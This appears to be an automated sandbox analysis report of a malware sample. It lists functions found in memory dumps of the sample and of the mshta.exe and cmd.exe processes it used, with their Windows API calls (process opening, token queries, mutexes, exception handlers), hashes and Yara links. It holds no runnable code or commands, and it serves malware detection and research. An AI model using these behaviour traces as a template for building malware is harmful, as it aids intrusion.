Opcode ID: cea6bb8843a24edcb29c74c7ca467b16ef60be393ed32cce7c9695121158747b
Instruction ID: bede21e7eebc65d4eadae82242230dac684eb99d351499b7c0a38d995ad873ef
Opcode Fuzzy Hash: cea6bb8843a24edcb29c74c7ca467b16ef60be393ed32cce7c9695121158747b
Instruction Fuzzy Hash: 71F01776801228BBCB11EBA4ED49DCFBBBCEF04750F008065B909A6054E7749B44CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0076239C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12COMMON

Download Yara Rule

APIs

RtlNtStatusToDosError.NTDLL(?), ref: 007623A2
SetLastError.KERNEL32(~$Qu,00774090,00000020,00760552,?,80000000,?,?,80000000,?,?,007740C0,00000018,0076CD58,?,?), ref: 007623B8

Strings

~$Qu, xrefs: 007623B5

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Error$LastStatus
String ID: ~$Qu
API String ID: 4076355890-372182825
Opcode ID: 427608f2a8b0918205651c0b1db03aecdfc3cd470ad7ce2bf68bfb1225001831
Instruction ID: 1db69fb1e306d700d7abc6d846853b412cd70a82de0fbf1c42cf2bf3ddfc4284
Opcode Fuzzy Hash: 427608f2a8b0918205651c0b1db03aecdfc3cd470ad7ce2bf68bfb1225001831
Instruction Fuzzy Hash: 47D02D35C11619EBCF119BA4DD09A9DBB71BB14351F508265E825A21A1CB380952DA54

Uniqueness

Uniqueness Score: -1.00%

Function 0075CCDF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12COMMON

Download Yara Rule

APIs

RtlNtStatusToDosError.NTDLL(?), ref: 0075CCE5
SetLastError.KERNEL32(~ Uqt,007740A0,0000001C,00760532,?,?,80000000,?,?,007740C0,00000018,0076CD58,?,?,80000000,007779E8), ref: 0075CCFB

Strings

~ Uqt, xrefs: 0075CCF8

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Error$LastStatus
String ID: ~ Uqt
API String ID: 4076355890-734598980
Opcode ID: 355ed07e979b21a3228c94d334d4928ee862587050693fd6ac50813b67e3a403
Instruction ID: 1e094f6c5e87d57343e0b0e5458bf1bda179ed82cbccf06b15e990009f0268cf
Opcode Fuzzy Hash: 355ed07e979b21a3228c94d334d4928ee862587050693fd6ac50813b67e3a403
Instruction Fuzzy Hash: 77D0E231C01209DFCF119BA4D9096DDBBB0BB08311F20C161E821B21A1CB390E51EF20

Uniqueness

Uniqueness Score: -1.00%

Function 00772933 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00772920

Part of subcall function 00771EC3: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,000240EC,00750000), ref: 00771F3C

Strings

=)w, xrefs: 0077291A
3)w, xrefs: 00772933

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID: 3)w$=)w
API String ID: 123106877-3866246478
Opcode ID: 70c0bbad843dfd7cb386aadbd7e614a399a095956d3706deac94a2884a37f55f
Instruction ID: bc694ec8aa870ef006c67009a9d4b0711520b248dca337e2b02ceb6b5834b557
Opcode Fuzzy Hash: 70c0bbad843dfd7cb386aadbd7e614a399a095956d3706deac94a2884a37f55f
Instruction Fuzzy Hash: E4B012D236D200AC3D48518A1C06C3B014CE6C4BD1730C43AF41CC5043D68C1D4151B3

Uniqueness

Uniqueness Score: -1.00%

Function 0077234B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00772338

Part of subcall function 00771EC3: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,000240EC,00750000), ref: 00771F3C

Strings

K#w, xrefs: 0077234B
U#w, xrefs: 00772332

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID: K#w$U#w
API String ID: 123106877-608563830
Opcode ID: cd376ef4f9dc9bda8ac41bef52ab5ae215674054e98a188c7793cac1e88b203c
Instruction ID: dda44aaf0d567f7872a2277d5487cdf4ecea103a821b2fb523c86f2e1a74f5b4
Opcode Fuzzy Hash: cd376ef4f9dc9bda8ac41bef52ab5ae215674054e98a188c7793cac1e88b203c
Instruction Fuzzy Hash: 21B012D126C200BC3D0861885D06C37014CC1C4BE1370C87AF41CCD043F58C0E828132

Uniqueness

Uniqueness Score: -1.00%

Function 0076A579 Relevance: 5.2, APIs: 4, Instructions: 172memoryCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0076A5D8
CloseHandle.KERNEL32(?,00000000,00000100,?,00000000,?,0075C1CF,00000000), ref: 0076A626
HeapFree.KERNEL32(00000000,00000000,00000000,00000094,0075F26B,00000000,0075C1CF,0076F415,00000000,0075C1CF,00759792,00000000,0075C1CF,Function_0000A165,00000000,0075C1CF), ref: 0076A8DF
GetLastError.KERNEL32(?,00000000,?), ref: 0076ABE3

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: CloseErrorFreeHandleHeapLastmemset
String ID:
API String ID: 2333114656-0
Opcode ID: fc61f1f9c5bf6e5f3ad80cd7ab480e7f028670fd5ec9536ed753bc316f0e2016
Instruction ID: fa8d87127d80311eb852ad5ac8fcd3d63148d993eb0dbfc2e60c5a8d2680226a
Opcode Fuzzy Hash: fc61f1f9c5bf6e5f3ad80cd7ab480e7f028670fd5ec9536ed753bc316f0e2016
Instruction Fuzzy Hash: E651B7B1644208FADB216F74DC4AFAF7A6AEB45750F104022FD0FB6091D67C8941AFA7

Uniqueness

Uniqueness Score: -1.00%

Function 0076FAFE Relevance: 5.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0076FB24
memcpy.NTDLL ref: 0076FB4C

Part of subcall function 007684EA: RtlNtStatusToDosError.NTDLL(00000000), ref: 00768522
Part of subcall function 007684EA: SetLastError.KERNEL32(00000000,?,?,?,00752446), ref: 00768529

GetLastError.KERNEL32(00000010,00000218,0077254D,00000100,?,00000318,00000008), ref: 0076FB63
GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,0077254D,00000100), ref: 0076FC46

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Error$Last$Statusmemcpymemset
String ID:
API String ID: 1706616652-0
Opcode ID: f8083a1f7b609444bf409cd45aa85eaec9320dff5ab3a1b1a0c467596450fdc6
Instruction ID: ec3b47836246d00514b36318c743c58dcdab83102929505ad26d7aae3a1d7dbf
Opcode Fuzzy Hash: f8083a1f7b609444bf409cd45aa85eaec9320dff5ab3a1b1a0c467596450fdc6
Instruction Fuzzy Hash: FD41ADB1504305EFD720DF28DC46BABBBE9FB98350F00892DF999C6291E774D9148B62

Uniqueness

Uniqueness Score: -1.00%

Function 0075EBA7 Relevance: 5.1, APIs: 4, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0076E015: lstrlen.KERNEL32(00000000,?,?,?,77D44620,?,?,?,?,0075CE7D,?,?,?,?,?), ref: 0076E06F
Part of subcall function 0076E015: lstrlen.KERNEL32(?,?,?,?,77D44620,?,?,?,?,0075CE7D,?,?,?,?,?), ref: 0076E08D
Part of subcall function 0076E015: RtlAllocateHeap.NTDLL(00000000,74716985,?), ref: 0076E0B9
Part of subcall function 0076E015: memcpy.NTDLL(00000000,00000000,00000000,?,77D44620,?,?,?,?,0075CE7D,?,?,?,?,?), ref: 0076E0D0
Part of subcall function 0076E015: HeapFree.KERNEL32(00000000,00000000), ref: 0076E0E3
Part of subcall function 0076E015: memcpy.NTDLL(00000000,?,?,?,77D44620,?,?,?,?,0075CE7D,?,?,?,?,?), ref: 0076E0F2

GetLastError.KERNEL32 ref: 0075EC46

Part of subcall function 007645D3: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00764681
Part of subcall function 007645D3: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 007646A5
Part of subcall function 007645D3: HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,0075D071,?,?), ref: 007646B3

HeapFree.KERNEL32(00000000,?), ref: 0075EC62
HeapFree.KERNEL32(00000000,?), ref: 0075EC73
SetLastError.KERNEL32(00000000), ref: 0075EC76

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Heap$Free$ErrorLastlstrlenmemcpy$Allocate
String ID:
API String ID: 2451549186-0
Opcode ID: 27b5ced2a18df2aa49c9a3f6f963be43a07f2ed560a834a9d7d120af361f0162
Instruction ID: 47a990258ef62bc322f7ed28a116ecb141aec8c57ea75f395f98114790fea7a6
Opcode Fuzzy Hash: 27b5ced2a18df2aa49c9a3f6f963be43a07f2ed560a834a9d7d120af361f0162
Instruction Fuzzy Hash: 4A318E35900108FFCF069F99DC448DEBFB6FF44351B10416AF916A2120C7798AA5DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0075CFEA Relevance: 5.1, APIs: 4, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0075CE1C: lstrlenW.KERNEL32(?), ref: 0075CE40
Part of subcall function 0075CE1C: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0075CE52
Part of subcall function 0075CE1C: wcstombs.NTDLL ref: 0075CE60
Part of subcall function 0075CE1C: lstrlen.KERNEL32(00000000,?,?,?,?,?), ref: 0075CE84
Part of subcall function 0075CE1C: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 0075CE99
Part of subcall function 0075CE1C: mbstowcs.NTDLL ref: 0075CEA6
Part of subcall function 0075CE1C: HeapFree.KERNEL32(00000000,00000000), ref: 0075CEB8
Part of subcall function 0075CE1C: HeapFree.KERNEL32(00000000,00000000,?,?), ref: 0075CED2

GetLastError.KERNEL32 ref: 0075D089

Part of subcall function 007645D3: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00764681
Part of subcall function 007645D3: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 007646A5
Part of subcall function 007645D3: HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,0075D071,?,?), ref: 007646B3

HeapFree.KERNEL32(00000000,?), ref: 0075D0A5
HeapFree.KERNEL32(00000000,?), ref: 0075D0B6
SetLastError.KERNEL32(00000000), ref: 0075D0B9

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Heap$Free$AllocateErrorLastlstrlen$mbstowcswcstombs
String ID:
API String ID: 3867366388-0
Opcode ID: cf2f6afe96eae8ecb97561adcc184404f4c59cde76758d29d8e39e84524fefef
Instruction ID: f1d94cbc5c306ece0c8673c73b958038a088777b80ca02febe70757fc5417c0a
Opcode Fuzzy Hash: cf2f6afe96eae8ecb97561adcc184404f4c59cde76758d29d8e39e84524fefef
Instruction Fuzzy Hash: 9A312631900108EFCF229FA9DC448EEBFB6EF44351F108166F919A2161C7798EA5DF95

Uniqueness

Uniqueness Score: -1.00%

Function 0075FA39 Relevance: 5.1, APIs: 4, Instructions: 76COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0075FA84
memset.NTDLL ref: 0075FA9B
memset.NTDLL ref: 0075FAB2
memset.NTDLL ref: 0075FACA

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: bccf966fd2bc285695e63058706f35fc39ab3d9b169306fc1f93dce4ad3550e8
Instruction ID: 6118c2c9d839a4e89de47362eca6e468a339000a1a1b44e315452659a7ee3bc7
Opcode Fuzzy Hash: bccf966fd2bc285695e63058706f35fc39ab3d9b169306fc1f93dce4ad3550e8
Instruction Fuzzy Hash: 7821AE72100509FBCB24AF61DC84AA67B3AFF0A3017100529FD4A8A811D7B6F9B5DBD2

Uniqueness

Uniqueness Score: -1.00%

Function 00771702 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,?,00000000,00000008,00000000,?,00759EF2,?,00000000,00000004,00000000), ref: 0077170E

Part of subcall function 0075E83D: RtlAllocateHeap.NTDLL(00000000,?,00764741), ref: 0075E849

Part of subcall function 00771AC2: StrChrA.SHLWAPI(00000000,0000002F,00000000,00000000,0077173C,00000000,00000001,00000001,?,00759EF2,?,00000000,00000004,00000000), ref: 00771AD0
Part of subcall function 00771AC2: StrChrA.SHLWAPI(00000000,0000003F,?,00759EF2,?,00000000,00000004,00000000), ref: 00771ADA

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,00759EF2,?,00000000,00000004,00000000), ref: 0077176C
lstrcpy.KERNEL32(00000000,00000008), ref: 0077177C
lstrcpy.KERNEL32(00000000,00000000), ref: 00771788

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 12818ff4b592b5d90f0a36052d256473844b38ad0e30955478431fd3e29f7f7e
Instruction ID: 9091a9ee01f758dfe60ad1719854e537373f7f927b649475a0ce26588cd59a1c
Opcode Fuzzy Hash: 12818ff4b592b5d90f0a36052d256473844b38ad0e30955478431fd3e29f7f7e
Instruction Fuzzy Hash: 8B219076504255EBCF129F78CC88AAA7FA9AF053C0B45C055F80D9B202D739DA00D7E0

Uniqueness

Uniqueness Score: -1.00%

Function 0076B132 Relevance: 5.1, APIs: 4, Instructions: 64COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0076B166
memset.NTDLL ref: 0076B17D
memset.NTDLL ref: 0076B194
memset.NTDLL ref: 0076B1AC

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 81ea673d10932c8171c615a4c68006ec9cd697a5300c55123b0af308c3db69df
Instruction ID: 5cb579feae0c83bffb632a677eb47872076c0b42164e6699fd6dbbfdef561e67
Opcode Fuzzy Hash: 81ea673d10932c8171c615a4c68006ec9cd697a5300c55123b0af308c3db69df
Instruction Fuzzy Hash: 11118C7250090DFBCB289FA0EC45A66BB39FF0B300B050528FD4691891D77AB9B1DBD1

Uniqueness

Uniqueness Score: -1.00%

Function 00756389 Relevance: 5.0, APIs: 4, Instructions: 38stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(69B25F44,?,?,00000000,00761EDE,00000000,?,69B25F44,?,?,69B25F44,?,00000000,00000000,0075DA65), ref: 0075639A
lstrlen.KERNEL32(?,?,?,00000000,00761EDE,00000000,?,69B25F44,?,?,69B25F44,?,00000000,00000000,0075DA65), ref: 0075639F

Part of subcall function 0075E83D: RtlAllocateHeap.NTDLL(00000000,?,00764741), ref: 0075E849

memcpy.NTDLL(00000000,?,00000000,?,?,?,00000000,00761EDE,00000000,?,69B25F44,?,?,69B25F44,?,00000000), ref: 007563BB
lstrcpy.KERNEL32(00000000,?), ref: 007563D9

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: lstrlen$AllocateHeaplstrcpymemcpy
String ID:
API String ID: 1697500751-0
Opcode ID: 8f0ea536d60a385376dc78a6bfdac0b5aa43efe0dda56c32bd1b78028cd575a3
Instruction ID: 54ba34915696079a66c90c11faa892d598ec2652c73e9a8f9f43c5daa354423c
Opcode Fuzzy Hash: 8f0ea536d60a385376dc78a6bfdac0b5aa43efe0dda56c32bd1b78028cd575a3
Instruction Fuzzy Hash: 03F0F6B7400751EBD7229B699C4CE9BBBA9BFC5352B440115FE0887201D779D808CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00764D3D Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(03F08498,74715520,77D3EEF0,00000000,0076C61F,00000000), ref: 00764D4D
lstrlen.KERNEL32(?), ref: 00764D55

Part of subcall function 0075E83D: RtlAllocateHeap.NTDLL(00000000,?,00764741), ref: 0075E849

lstrcpy.KERNEL32(00000000,03F08498), ref: 00764D69
lstrcat.KERNEL32(00000000,?), ref: 00764D74

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: 68a3bca4ff48ce2770e30ff1b8b28739b466b9f1933e9d24e03d9d4478562bc3
Instruction ID: 7fb15160999214481893ff6e421f88fbfeff139d387c47b37f3fd6002d360f0f
Opcode Fuzzy Hash: 68a3bca4ff48ce2770e30ff1b8b28739b466b9f1933e9d24e03d9d4478562bc3
Instruction Fuzzy Hash: 10E09273901620A78B119BF8AC4CC6FFBADFF897923044416FA04D3110C729D901DBA5

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mshta.exePID: 6016, Parent PID: 3528COMMON

Executed Functions

Function 000001B81DE50FB9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000003.404318324.000001B81DE50000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001B81DE50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_1b81de50000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: 3a8c9a7db01cffd2143cf260517d94d8456903d5cdee8b0c0211ec4cda7e30ab
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash: 6F90025D49641659D41465950C4539C64446388691FD44480541790144DA4D02975262

Uniqueness

Uniqueness Score: -1.00%

Function 000001B81DE50FC1 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000003.404318324.000001B81DE50000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001B81DE50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_1b81de50000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: 3a8c9a7db01cffd2143cf260517d94d8456903d5cdee8b0c0211ec4cda7e30ab
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash: 6F90025D49641659D41465950C4539C64446388691FD44480541790144DA4D02975262

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: cmd.exePID: 5832, Parent PID: 3528COMMON

Executed Functions

Function 0303D196 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 94
threadmemorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 0303D1C1
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 0303D1CE
NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 0303D25A
GetModuleHandleA.KERNEL32(00000000), ref: 0303D265
RtlImageNtHeader.NTDLL(00000000), ref: 0303D26E
RtlExitUserThread.NTDLL(00000000), ref: 0303D283

Part of subcall function 03040E50: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,0303D1FC,?), ref: 03040E58
Part of subcall function 03040E50: GetVersion.KERNEL32 ref: 03040E67
Part of subcall function 03040E50: GetCurrentProcessId.KERNEL32 ref: 03040E83
Part of subcall function 03040E50: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 03040EA0

Part of subcall function 0302D39E: memcpy.NTDLL(00000000,?,?,?,?,?,?,?), ref: 0302D3FD

Part of subcall function 0303D0F7: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,0302EB10), ref: 0303D11D

Part of subcall function 0303BB46: GetModuleHandleA.KERNEL32(?,03048190,?,?,?,0303DA64,00000000,03048190,?,00000000), ref: 0303BB67
Part of subcall function 0303BB46: GetProcAddress.KERNEL32(00000000,?), ref: 0303BB80
Part of subcall function 0303BB46: OpenProcess.KERNEL32(00000400,00000000,0303DA64,03048190,?,?,?,0303DA64,00000000,03048190,?,00000000), ref: 0303BB9D
Part of subcall function 0303BB46: IsWow64Process.KERNEL32(00000000,00000000,03048190,?,?,?,0303DA64,00000000,03048190,?,00000000), ref: 0303BBAE
Part of subcall function 0303BB46: FindCloseChangeNotification.KERNELBASE(00000000,?,?,0303DA64,00000000,03048190,?,00000000), ref: 0303BBC1

Strings

UV\, xrefs: 0303D1F2

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Process$Module$CreateFileHandleOpenThreadTime$AddressChangeCloseCurrentEventExitFindHeaderHeapImageInformationNameNotificationProcQuerySystemUserVersionWow64memcpy
String ID: UV\
API String ID: 2581485877-1101970539
Opcode ID: 380ffefcdd06e036b32d1a0859e297f7b3cadd33b8133b471dccd7f43d346148
Instruction ID: 43e32af90063c04596074af11a1690fde5a00829fa9fd421180233f28e5b4796
Opcode Fuzzy Hash: 380ffefcdd06e036b32d1a0859e297f7b3cadd33b8133b471dccd7f43d346148
Instruction Fuzzy Hash: 823109B9A02214AFC721FFA9DD84EAEB7BCEB85750F144565E512EB204D734DE00CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0302D977 Relevance: 10.6, APIs: 7, Instructions: 113
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrRChrA.SHLWAPI(030481C4,00000000,0000005C,?,?,?), ref: 0302D9B3
_strupr.NTDLL ref: 0302D9C9
lstrlen.KERNEL32(030481C4,?,?), ref: 0302D9D1
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?), ref: 0302DA51
RtlAddVectoredExceptionHandler.NTDLL(00000000,030380A1), ref: 0302DA78
GetLastError.KERNEL32(?,?), ref: 0302DA92
RtlRemoveVectoredExceptionHandler.NTDLL(03048188), ref: 0302DAA8

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ExceptionHandlerVectored$CreateErrorEventLastRemove_struprlstrlen
String ID:
API String ID: 2251957091-0
Opcode ID: 486fafca97a978d6d8233d5ec43fd111a8419d20dda6adc3fe33513b2f421d7e
Instruction ID: 4f319919e096d29178cb734c2f80285dde961316fd789dbb980c6f1f86972bbf
Opcode Fuzzy Hash: 486fafca97a978d6d8233d5ec43fd111a8419d20dda6adc3fe33513b2f421d7e
Instruction Fuzzy Hash: E73107FA9072716FDB50FF7C9D84DAEBBEC9705200B0A896AE921D7154D7398E404B50

Uniqueness

Uniqueness Score: -1.00%

Function 0302AA0B Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtOpenProcess.NTDLL(?,00000400,?,?), ref: 0302AA52
NtOpenProcessToken.NTDLL(?,00000008,?), ref: 0302AA65
NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,?), ref: 0302AA81

Part of subcall function 0302E83D: RtlAllocateHeap.NTDLL(00000000,?,03034741), ref: 0302E849

NtQueryInformationToken.NTDLL(?,00000001,00000000,?,?,?), ref: 0302AA9E
memcpy.NTDLL(?,00000000,0000001C), ref: 0302AAAB
NtClose.NTDLL(?), ref: 0302AABD
NtClose.NTDLL(?), ref: 0302AAC7

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: 645fc6a21a12ebcd1e0adfaf6500b9e061df8cf97ceeb0cb01284772e0251345
Instruction ID: 5053a9e9c8e765d639d60bce60c1433201be9e705ef3f3ccc4f920115022a946
Opcode Fuzzy Hash: 645fc6a21a12ebcd1e0adfaf6500b9e061df8cf97ceeb0cb01284772e0251345
Instruction Fuzzy Hash: CB2116BAA01228BBDB01EFA4CE449DEBFBDEF48B50F104062F901E6150D7758B54DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03038E68 Relevance: 1.5, APIs: 1, Instructions: 33nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(00000000,03025124,00000018,00000000,03048420), ref: 03038E7F

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 04147774ee3c35a9a1752ff88e87b89a6d3e7773d7850a4d1f73a1fff2b8ded4
Instruction ID: 7ffde2a057252bdde4b680159e47f34d039d338dfed548aad9baad3015d86573
Opcode Fuzzy Hash: 04147774ee3c35a9a1752ff88e87b89a6d3e7773d7850a4d1f73a1fff2b8ded4
Instruction Fuzzy Hash: A1F05E753121159BC724DE59CC84E9BBBBCEB46B507148594F900DB260D334E90ACBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0302AC19 Relevance: 22.8, APIs: 15, Instructions: 321
memorylibrarysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0302E83D: RtlAllocateHeap.NTDLL(00000000,?,03034741), ref: 0302E849

memset.NTDLL ref: 0302AC68

Part of subcall function 0303448F: GetVersion.KERNEL32(?,00000000,?,?,0302DA8B,?,?,?), ref: 030344DA
Part of subcall function 0303448F: GetModuleHandleA.KERNEL32(0000166E,?,00000000,?,?,0302DA8B,?,?,?), ref: 0303450E

Part of subcall function 0302DC80: RtlAllocateHeap.NTDLL(00000000,-00000003,030430DC), ref: 0302DC9A

CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000060,?,00000000,?,?,0302DA8B,?,?,?), ref: 0302ACA2
CloseHandle.KERNEL32(03048180,?,00000000,?,?,0302DA8B,?,?,?), ref: 0302ACC7
GetUserNameA.ADVAPI32(00000000,?,?,00000000,?,?,0302DA8B,?,?,?), ref: 0302AD10
RtlAllocateHeap.NTDLL(00000000,?), ref: 0302AD23
OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,?,?,0302DA8B,?,?,?), ref: 0302AD65
CloseHandle.KERNEL32(00000000,?,00000000,?,?,0302DA8B,?,?,?), ref: 0302AD7C
memcpy.NTDLL(03048314,?,00000018,?,00000000,?,?,0302DA8B,?,?,?), ref: 0302ADDA
RtlAllocateHeap.NTDLL(00000000,00000018), ref: 0302AE82
OpenEventA.KERNEL32(00100000,00000000,03048178,?,00000000,?,?,0302DA8B,?,?,?), ref: 0302AEAA
